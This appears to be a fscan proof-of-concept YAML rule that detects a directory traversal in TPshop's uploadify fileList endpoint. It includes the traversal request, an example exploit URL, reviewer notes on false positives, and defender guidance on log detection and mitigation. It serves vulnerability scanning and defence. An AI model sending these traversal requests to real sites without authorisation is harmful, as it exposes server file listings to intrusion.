mirror of https://github.com/qwqdanchun/fscan.git
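# fscan PoC rule: checks whether a TPshop site exposes a directory traversal
# through the uploadify fileList endpoint.
# Structure restored from a rendered file view that had dropped all
# indentation and interleaved table-gutter lines, leaving invalid YAML.
name: poc-yaml-tpshop-directory-traversal
rules:
  # Single unauthenticated GET. The `path=../` parameter asks the file-list
  # handler for a directory above its default one; presumably a fixed or
  # hardened endpoint rejects or ignores it (confirm against the target
  # version).
  - method: GET
    path: /index.php/Home/uploadify/fileList?type=.+&path=../
    headers:
      Accept-Encoding: 'deflate'
    # A redirect (for example to a login page) is not followed, so it can
    # never satisfy the status == 200 condition below.
    follow_redirects: false
    # Match condition: HTTP 200 plus two byte substrings anywhere in the body.
    # NOTE(review): "total" is a generic word and "state":"SUCCESS" is a
    # common JSON status field, so an unrelated endpoint returning similar
    # JSON would also match. Treat a hit as a lead and confirm it manually,
    # e.g. by checking that the listing really contains entries outside the
    # upload directory.
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string("\"state\":\"SUCCESS\""))) && response.body.bcontains(bytes(string("total")))
detail:
  author: 清风明月(www.secbook.info)
  # No version range is given, so the rule cannot tell patched from
  # unpatched TPshop releases.
  influence_version: 'TPshop'
  links:
    - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
    - http://www.tp-shop.cn
  # Sample request against localhost; same endpoint as the rule, one level
  # deeper.
  exploit:
    - https://localhost/index.php/Home/uploadify/fileList?type=.+&path=../../
# Defender notes:
# - Detection: in web-server or WAF logs, look for requests to
#   /index.php/Home/uploadify/fileList whose `path` parameter contains `../`
#   (also check URL-encoded forms such as %2e%2e%2f).
# - Mitigation: require an authenticated session for the uploadify
#   endpoints, resolve `path` to its canonical form server-side, and reject
#   anything that falls outside the intended upload root.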